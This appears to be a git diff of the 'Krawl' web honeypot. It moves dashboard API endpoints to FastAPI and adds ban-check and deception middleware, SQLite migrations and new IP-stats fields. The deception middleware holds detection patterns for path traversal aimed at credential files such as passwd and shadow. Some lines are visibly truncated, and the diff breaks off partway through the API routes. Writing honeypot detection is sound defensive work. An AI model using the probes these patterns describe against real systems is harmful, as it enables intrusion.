self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - - # Parse query parameters - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["25"])[0]) - sort_by = query_params.get("sort_by", ["total_requests"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - # Ensure valid parameters - page = max(1, page) - page_size = min(max(1, page_size), 100) # Max 100 per page - - result = db.get_all_ips_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching all IPs: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for fetching IP stats - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/ip-stats/" - ): - ip_address = self.path.replace( - f"{self.config.dashboard_secret_path}/api/ip-stats/", "" - ) - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - # Prevent browser caching - force fresh data from database every time - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - - db = get_database() - ip_stats = db.get_ip_stats_by_ip(ip_address) - if ip_stats: - self.wfile.write(json.dumps(ip_stats).encode()) - else: - self.wfile.write(json.dumps({"error": "IP not found"}).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching IP stats: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated honeypot triggers - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/honeypot" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["count"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_honeypot_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching honeypot data: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated credentials - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/credentials" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["timestamp"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_credentials_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching credentials: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated top IPs - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/top-ips" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["count"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_top_ips_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching top IPs: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated top paths - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/top-paths" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["count"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_top_paths_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching top paths: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated top user agents - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/top-user-agents" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["count"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_top_user_agents_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching top user agents: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated attack types - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/attack-types" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["timestamp"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_attack_types_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching attack types: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for downloading malicious IPs file - if ( - self.config.dashboard_secret_path - and self.path - == f"{self.config.dashboard_secret_path}/api/download/malicious_ips.txt" - ): - import os - - file_path = os.path.join( - os.path.dirname(__file__), "exports", "malicious_ips.txt" - ) - try: - if os.path.exists(file_path): - with open(file_path, "rb") as f: - content = f.read() - self.send_response(200) - self.send_header("Content-type", "text/plain") - self.send_header( - "Content-Disposition", - 'attachment; filename="malicious_ips.txt"', - ) - self.send_header("Content-Length", str(len(content))) - self.end_headers() - self.wfile.write(content) - else: - self.send_response(404) - self.send_header("Content-type", "text/plain") - self.end_headers() - self.wfile.write(b"File not found") - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error serving malicious IPs file: {e}") - self.send_response(500) - self.send_header("Content-type", "text/plain") - self.end_headers() - self.wfile.write(b"Internal server error") - return - - self.tracker.record_access(client_ip, self.path, user_agent, method="GET") - - # self.analyzer.infer_user_category(client_ip) - # self.analyzer.update_ip_rep_infos(client_ip) - - if self.tracker.is_suspicious_user_agent(user_agent): - self.access_logger.warning( - f"[SUSPICIOUS] {client_ip} - {user_agent[:50]} - {self.path}" - ) - - if self._should_return_error(): - error_code = self._get_random_error_code() - self.access_logger.info( - f"Returning error {error_code} to {client_ip} - {self.path}" - ) - self.send_response(error_code) - self.end_headers() - return - - if self.serve_special_path(self.path): - return - - time.sleep(self.config.delay / 1000.0) - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - - try: - # Increment page visit counter for this IP and get the current count - current_visit_count = self._increment_page_visit(client_ip) - self.wfile.write( - self.generate_page(self.path, current_visit_count).encode() - ) - - Handler.counter -= 1 - - if Handler.counter < 0: - Handler.counter = self.config.canary_token_tries - except BrokenPipeError: - # Client disconnected, ignore silently - pass - except Exception as e: - self.app_logger.error(f"Error generating page: {e}") - - def log_message(self, format, *args): - """Override to customize logging - uses access logger""" - client_ip = self._get_client_ip() - self.access_logger.info(f"{client_ip} - {format % args}") diff --git a/src/logger.py b/src/logger.py index 9762002..d556684 100644 --- a/src/logger.py +++ b/src/logger.py @@ -36,12 +36,13 @@ class LoggerManager: cls._instance._initialized = False return cls._instance - def initialize(self, log_dir: str = "logs") -> None: + def initialize(self, log_dir: str = "logs", log_level: str = "INFO") -> None: """ Initialize the logging system with rotating file handlers.loggers Args: log_dir: Directory for log files (created if not exists) + log_level: Logging level (DEBUG, INFO, WARNING, ERROR, CRITICAL) """ if self._initialized: return @@ -59,9 +60,11 @@ class LoggerManager: max_bytes = 1048576 # 1MB backup_count = 5 + level = getattr(logging, log_level.upper(), logging.INFO) + # Setup application logger self._app_logger = logging.getLogger("krawl.app") - self._app_logger.setLevel(logging.INFO) + self._app_logger.setLevel(level) self._app_logger.handlers.clear() app_file_handler = RotatingFileHandler( @@ -78,7 +81,7 @@ class LoggerManager: # Setup access logger self._access_logger = logging.getLogger("krawl.access") - self._access_logger.setLevel(logging.INFO) + self._access_logger.setLevel(level) self._access_logger.handlers.clear() access_file_handler = RotatingFileHandler( @@ -95,7 +98,7 @@ class LoggerManager: # Setup credential logger (special format, no stream handler) self._credential_logger = logging.getLogger("krawl.credentials") - self._credential_logger.setLevel(logging.INFO) + self._credential_logger.setLevel(level) self._credential_logger.handlers.clear() # Credential logger uses a simple format: timestamp|ip|username|password|path @@ -152,6 +155,6 @@ def get_credential_logger() -> logging.Logger: return _logger_manager.credentials -def initialize_logging(log_dir: str = "logs") -> None: +def initialize_logging(log_dir: str = "logs", log_level: str = "INFO") -> None: """Initialize the logging system.""" - _logger_manager.initialize(log_dir) + _logger_manager.initialize(log_dir, log_level) diff --git a/src/middleware/__init__.py b/src/middleware/__init__.py new file mode 100644 index 0000000..be27011 --- /dev/null +++ b/src/middleware/__init__.py @@ -0,0 +1,5 @@ +#!/usr/bin/env python3 + +""" +FastAPI middleware package for the Krawl honeypot. +""" diff --git a/src/middleware/ban_check.py b/src/middleware/ban_check.py new file mode 100644 index 0000000..a3be689 --- /dev/null +++ b/src/middleware/ban_check.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python3 + +""" +Middleware for checking if client IP is banned. +""" + +from starlette.middleware.base import BaseHTTPMiddleware +from starlette.requests import Request +from starlette.responses import Response + +from dependencies import get_client_ip + + +class BanCheckMiddleware(BaseHTTPMiddleware): + async def dispatch(self, request: Request, call_next): + # Skip ban check for dashboard routes + config = request.app.state.config + dashboard_prefix = "/" + config.dashboard_secret_path.lstrip("/") + if request.url.path.startswith(dashboard_prefix): + return await call_next(request) + + client_ip = get_client_ip(request) + tracker = request.app.state.tracker + + if tracker.is_banned_ip(client_ip): + return Response(status_code=500) + + response = await call_next(request) + return response diff --git a/src/middleware/deception.py b/src/middleware/deception.py new file mode 100644 index 0000000..6070a14 --- /dev/null +++ b/src/middleware/deception.py @@ -0,0 +1,102 @@ +#!/usr/bin/env python3 + +""" +Middleware for deception response detection (path traversal, XXE, command injection). +Short-circuits the request if a deception response is triggered. +""" + +import asyncio +from starlette.middleware.base import BaseHTTPMiddleware +from starlette.requests import Request +from starlette.responses import Response + +from deception_responses import detect_and_respond_deception +from dependencies import get_client_ip, build_raw_request +from logger import get_app_logger, get_access_logger + + +class DeceptionMiddleware(BaseHTTPMiddleware): + async def dispatch(self, request: Request, call_next): + path = request.url.path + + # Skip deception detection for dashboard routes + config = request.app.state.config + dashboard_prefix = "/" + config.dashboard_secret_path.lstrip("/") + if path.startswith(dashboard_prefix): + return await call_next(request) + + query = request.url.query or "" + method = request.method + + # Read body for POST requests + body = "" + if method == "POST": + body_bytes = await request.body() + body = body_bytes.decode("utf-8", errors="replace") + + result = detect_and_respond_deception(path, query, body, method) + + if result: + response_body, content_type, status_code = result + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + app_logger = get_app_logger() + access_logger = get_access_logger() + + # Determine attack type for logging + full_input = f"{path} {query} {body}".lower() + attack_type_log = "UNKNOWN" + + if ( + "passwd" in path.lower() + or "shadow" in path.lower() + or ".." in path + or ".." in query + ): + attack_type_log = "PATH_TRAVERSAL" + elif body and (" bool: + """Check if an index exists.""" + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='index' AND name=?", (index_name,) + ) + return cursor.fetchone() is not None + + +def add_performance_indexes(db_path: str) -> bool: + """ + Add performance indexes to optimize queries. + + Args: + db_path: Path to the SQLite database file + + Returns: + True if indexes were added or already exist, False on error + """ + try: + # Check if database exists + if not os.path.exists(db_path): + print(f"Database file not found: {db_path}") + return False + + # Connect to database + conn = sqlite3.connect(db_path) + cursor = conn.cursor() + + indexes_added = [] + indexes_existed = [] + + # Index 1: attack_type for efficient GROUP BY operations + if not index_exists(cursor, "ix_attack_detections_attack_type"): + print("Adding index on attack_detections.attack_type...") + cursor.execute(""" + CREATE INDEX ix_attack_detections_attack_type + ON attack_detections(attack_type) + """) + indexes_added.append("ix_attack_detections_attack_type") + else: + indexes_existed.append("ix_attack_detections_attack_type") + + # Index 2: Composite index for attack_type + access_log_id + if not index_exists(cursor, "ix_attack_detections_type_log"): + print( + "Adding composite index on attack_detections(attack_type, access_log_id)..." + ) + cursor.execute(""" + CREATE INDEX ix_attack_detections_type_log + ON attack_detections(attack_type, access_log_id) + """) + indexes_added.append("ix_attack_detections_type_log") + else: + indexes_existed.append("ix_attack_detections_type_log") + + conn.commit() + conn.close() + + # Report results + if indexes_added: + print(f"Successfully added {len(indexes_added)} index(es):") + for idx in indexes_added: + print(f" - {idx}") + + if indexes_existed: + print(f"ℹ️ {len(indexes_existed)} index(es) already existed:") + for idx in indexes_existed: + print(f" - {idx}") + + if not indexes_added and not indexes_existed: + print("No indexes processed") + + return True + + except sqlite3.Error as e: + print(f"SQLite error: {e}") + return False + except Exception as e: + print(f"Unexpected error: {e}") + return False + + +def main(): + """Main migration function.""" + # Default database path + default_db_path = os.path.join( + os.path.dirname(os.path.dirname(__file__)), "data", "krawl.db" + ) + + # Allow custom path as command line argument + db_path = sys.argv[1] if len(sys.argv) > 1 else default_db_path + + print(f"Adding performance indexes to database: {db_path}") + print("=" * 60) + + success = add_performance_indexes(db_path) + + print("=" * 60) + if success: + print("Migration completed successfully") + print("\n💡 Performance tip: Run 'VACUUM' and 'ANALYZE' on your database") + print(" to optimize query planner statistics after adding indexes.") + sys.exit(0) + else: + print("Migration failed") + sys.exit(1) + + +if __name__ == "__main__": + main() diff --git a/src/migrations/add_raw_request_column.py b/src/migrations/add_raw_request_column.py new file mode 100644 index 0000000..81c3fd7 --- /dev/null +++ b/src/migrations/add_raw_request_column.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python3 + +""" +Migration script to add raw_request column to access_logs table. +This script is safe to run multiple times - it checks if the column exists before adding it. +""" + +import sqlite3 +import sys +import os +from pathlib import Path + + +def column_exists(cursor, table_name: str, column_name: str) -> bool: + """Check if a column exists in a table.""" + cursor.execute(f"PRAGMA table_info({table_name})") + columns = [row[1] for row in cursor.fetchall()] + return column_name in columns + + +def add_raw_request_column(db_path: str) -> bool: + """ + Add raw_request column to access_logs table if it doesn't exist. + + Args: + db_path: Path to the SQLite database file + + Returns: + True if column was added or already exists, False on error + """ + try: + # Check if database exists + if not os.path.exists(db_path): + print(f"Database file not found: {db_path}") + return False + + # Connect to database + conn = sqlite3.connect(db_path) + cursor = conn.cursor() + + # Check if column already exists + if column_exists(cursor, "access_logs", "raw_request"): + print("Column 'raw_request' already exists in access_logs table") + conn.close() + return True + + # Add the column + print("Adding 'raw_request' column to access_logs table...") + cursor.execute(""" + ALTER TABLE access_logs + ADD COLUMN raw_request TEXT + """) + + conn.commit() + conn.close() + + print("✅ Successfully added 'raw_request' column to access_logs table") + return True + + except sqlite3.Error as e: + print(f"SQLite error: {e}") + return False + except Exception as e: + print(f"Unexpected error: {e}") + return False + + +def main(): + """Main migration function.""" + # Default database path + default_db_path = os.path.join( + os.path.dirname(os.path.dirname(__file__)), "data", "krawl.db" + ) + + # Allow custom path as command line argument + db_path = sys.argv[1] if len(sys.argv) > 1 else default_db_path + + print(f"🔄 Running migration on database: {db_path}") + print("=" * 60) + + success = add_raw_request_column(db_path) + + print("=" * 60) + if success: + print("Migration completed successfully") + sys.exit(0) + else: + print("Migration failed") + sys.exit(1) + + +if __name__ == "__main__": + main() diff --git a/src/migrations/runner.py b/src/migrations/runner.py new file mode 100644 index 0000000..7a74267 --- /dev/null +++ b/src/migrations/runner.py @@ -0,0 +1,127 @@ +""" +Migration runner for Krawl. +Checks the database schema and applies any pending migrations at startup. +All checks are idempotent — safe to run on every boot. + +Note: table creation (e.g. category_history) is already handled by +Base.metadata.create_all() in DatabaseManager.initialize() and is NOT +duplicated here. This runner only covers ALTER-level changes that +create_all() cannot apply to existing tables (new columns, new indexes). +""" + +import sqlite3 +import logging +from typing import List + +logger = logging.getLogger("krawl") + + +def _column_exists(cursor, table_name: str, column_name: str) -> bool: + cursor.execute(f"PRAGMA table_info({table_name})") + columns = [row[1] for row in cursor.fetchall()] + return column_name in columns + + +def _index_exists(cursor, index_name: str) -> bool: + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='index' AND name=?", + (index_name,), + ) + return cursor.fetchone() is not None + + +def _migrate_raw_request_column(cursor) -> bool: + """Add raw_request column to access_logs if missing.""" + if _column_exists(cursor, "access_logs", "raw_request"): + return False + cursor.execute("ALTER TABLE access_logs ADD COLUMN raw_request TEXT") + return True + + +def _migrate_need_reevaluation_column(cursor) -> bool: + """Add need_reevaluation column to ip_stats if missing.""" + if _column_exists(cursor, "ip_stats", "need_reevaluation"): + return False + cursor.execute( + "ALTER TABLE ip_stats ADD COLUMN need_reevaluation BOOLEAN DEFAULT 0" + ) + return True + + +def _migrate_ban_state_columns(cursor) -> List[str]: + """Add ban/rate-limit columns to ip_stats if missing.""" + added = [] + columns = { + "page_visit_count": "INTEGER DEFAULT 0", + "ban_timestamp": "DATETIME", + "total_violations": "INTEGER DEFAULT 0", + "ban_multiplier": "INTEGER DEFAULT 1", + } + for col_name, col_type in columns.items(): + if not _column_exists(cursor, "ip_stats", col_name): + cursor.execute(f"ALTER TABLE ip_stats ADD COLUMN {col_name} {col_type}") + added.append(col_name) + return added + + +def _migrate_performance_indexes(cursor) -> List[str]: + """Add performance indexes to attack_detections if missing.""" + added = [] + if not _index_exists(cursor, "ix_attack_detections_attack_type"): + cursor.execute( + "CREATE INDEX ix_attack_detections_attack_type " + "ON attack_detections(attack_type)" + ) + added.append("ix_attack_detections_attack_type") + + if not _index_exists(cursor, "ix_attack_detections_type_log"): + cursor.execute( + "CREATE INDEX ix_attack_detections_type_log " + "ON attack_detections(attack_type, access_log_id)" + ) + added.append("ix_attack_detections_type_log") + + return added + + +def run_migrations(database_path: str) -> None: + """ + Check the database schema and apply any pending migrations. + + Only handles ALTER-level changes (columns, indexes) that + Base.metadata.create_all() cannot apply to existing tables. + + Args: + database_path: Path to the SQLite database file. + """ + applied: List[str] = [] + + try: + conn = sqlite3.connect(database_path) + cursor = conn.cursor() + + if _migrate_raw_request_column(cursor): + applied.append("add raw_request column to access_logs") + + if _migrate_need_reevaluation_column(cursor): + applied.append("add need_reevaluation column to ip_stats") + + ban_cols = _migrate_ban_state_columns(cursor) + for col in ban_cols: + applied.append(f"add {col} column to ip_stats") + + idx_added = _migrate_performance_indexes(cursor) + for idx in idx_added: + applied.append(f"add index {idx}") + + conn.commit() + conn.close() + except sqlite3.Error as e: + logger.error(f"Migration error: {e}") + + if applied: + for m in applied: + logger.info(f"Migration applied: {m}") + logger.info(f"All migrations complete ({len(applied)} applied)") + else: + logger.info("Database schema is up to date — no migrations needed") diff --git a/src/models.py b/src/models.py index 2dbeb30..8fb6e26 100644 --- a/src/models.py +++ b/src/models.py @@ -63,6 +63,8 @@ class AccessLog(Base): timestamp: Mapped[datetime] = mapped_column( DateTime, nullable=False, default=datetime.utcnow, index=True ) + # Raw HTTP request for forensic analysis (nullable for backward compatibility) + raw_request: Mapped[Optional[str]] = mapped_column(String, nullable=True) # Relationship to attack detections attack_detections: Mapped[List["AttackDetection"]] = relationship( @@ -126,7 +128,7 @@ class AttackDetection(Base): nullable=False, index=True, ) - attack_type: Mapped[str] = mapped_column(String(50), nullable=False) + attack_type: Mapped[str] = mapped_column(String(50), nullable=False, index=True) matched_pattern: Mapped[Optional[str]] = mapped_column( String(MAX_ATTACK_PATTERN_LENGTH), nullable=True ) @@ -136,6 +138,11 @@ class AttackDetection(Base): "AccessLog", back_populates="attack_detections" ) + # Composite index for efficient aggregation queries + __table_args__ = ( + Index("ix_attack_detections_type_log", "attack_type", "access_log_id"), + ) + def __repr__(self) -> str: return f"" @@ -162,12 +169,20 @@ class IpStats(Base): # GeoIP fields (populated by future enrichment) country_code: Mapped[Optional[str]] = mapped_column(String(2), nullable=True) city: Mapped[Optional[str]] = mapped_column(String(MAX_CITY_LENGTH), nullable=True) + country: Mapped[Optional[str]] = mapped_column(String(100), nullable=True) + region: Mapped[Optional[str]] = mapped_column(String(2), nullable=True) + region_name: Mapped[Optional[str]] = mapped_column(String(100), nullable=True) + timezone: Mapped[Optional[str]] = mapped_column(String(50), nullable=True) + isp: Mapped[Optional[str]] = mapped_column(String(100), nullable=True) + reverse: Mapped[Optional[str]] = mapped_column(String(255), nullable=True) latitude: Mapped[Optional[float]] = mapped_column(Float, nullable=True) longitude: Mapped[Optional[float]] = mapped_column(Float, nullable=True) asn: Mapped[Optional[int]] = mapped_column(Integer, nullable=True) asn_org: Mapped[Optional[str]] = mapped_column( String(MAX_ASN_ORG_LENGTH), nullable=True ) + is_proxy: Mapped[Optional[bool]] = mapped_column(Boolean, nullable=True) + is_hosting: Mapped[Optional[bool]] = mapped_column(Boolean, nullable=True) list_on: Mapped[Optional[Dict[str, str]]] = mapped_column(JSON, nullable=True) # Reputation fields (populated by future enrichment) @@ -185,6 +200,15 @@ class IpStats(Base): category_scores: Mapped[Dict[str, int]] = mapped_column(JSON, nullable=True) manual_category: Mapped[bool] = mapped_column(Boolean, default=False, nullable=True) last_analysis: Mapped[datetime] = mapped_column(DateTime, nullable=True) + need_reevaluation: Mapped[bool] = mapped_column( + Boolean, default=False, nullable=True + ) + + # Ban/rate-limit state (moved from in-memory tracker to DB) + page_visit_count: Mapped[int] = mapped_column(Integer, default=0, nullable=True) + ban_timestamp: Mapped[Optional[datetime]] = mapped_column(DateTime, nullable=True) + total_violations: Mapped[int] = mapped_column(Integer, default=0, nullable=True) + ban_multiplier: Mapped[int] = mapped_column(Integer, default=1, nullable=True) def __repr__(self) -> str: return f"" diff --git a/src/routes/__init__.py b/src/routes/__init__.py new file mode 100644 index 0000000..01413b0 --- /dev/null +++ b/src/routes/__init__.py @@ -0,0 +1,5 @@ +#!/usr/bin/env python3 + +""" +FastAPI routes package for the Krawl honeypot. +""" diff --git a/src/routes/api.py b/src/routes/api.py new file mode 100644 index 0000000..d94b3b6 --- /dev/null +++ b/src/routes/api.py @@ -0,0 +1,319 @@ +#!/usr/bin/env python3 + +""" +Dashboard JSON API routes. +Migrated from handler.py dashboard API endpoints. +All endpoints are prefixed with the secret dashboard path. +""" + +import os + +from fastapi import APIRouter, Request, Response, Query +from fastapi.responses import JSONResponse, PlainTextResponse + +from dependencies import get_db +from logger import get_app_logger + +router = APIRouter() + + +def _no_cache_headers() -> dict: + return { + "Cache-Control": "no-store, no-cache, must-revalidate, max-age=0", + "Pragma": "no-cache", + "Expires": "0", + "Access-Control-Allow-Origin": "*", + } + + +@router.get("/api/all-ip-stats") +async def all_ip_stats(request: Request): + db = get_db() + try: + ip_stats_list = db.get_ip_stats(limit=500) + return JSONResponse( + content={"ips": ip_stats_list}, + headers=_no_cache_headers(), + ) + except Exception as e: + get_app_logger().error(f"Error fetching all IP stats: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/attackers") +async def attackers( + request: Request, + page: int = Query(1), + page_size: int = Query(25), + sort_by: str = Query("total_requests"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_attackers_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching attackers: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/all-ips") +async def all_ips( + request: Request, + page: int = Query(1), + page_size: int = Query(25), + sort_by: str = Query("total_requests"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 10000) + + try: + result = db.get_all_ips_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching all IPs: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/ip-stats/{ip_address:path}") +async def ip_stats(ip_address: str, request: Request): + db = get_db() + try: + stats = db.get_ip_stats_by_ip(ip_address) + if stats: + return JSONResponse(content=stats, headers=_no_cache_headers()) + else: + return JSONResponse( + content={"error": "IP not found"}, headers=_no_cache_headers() + ) + except Exception as e: + get_app_logger().error(f"Error fetching IP stats: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/honeypot") +async def honeypot( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_honeypot_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching honeypot data: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/credentials") +async def credentials( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("timestamp"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_credentials_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching credentials: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/top-ips") +async def top_ips( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_top_ips_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching top IPs: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/top-paths") +async def top_paths( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_top_paths_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, 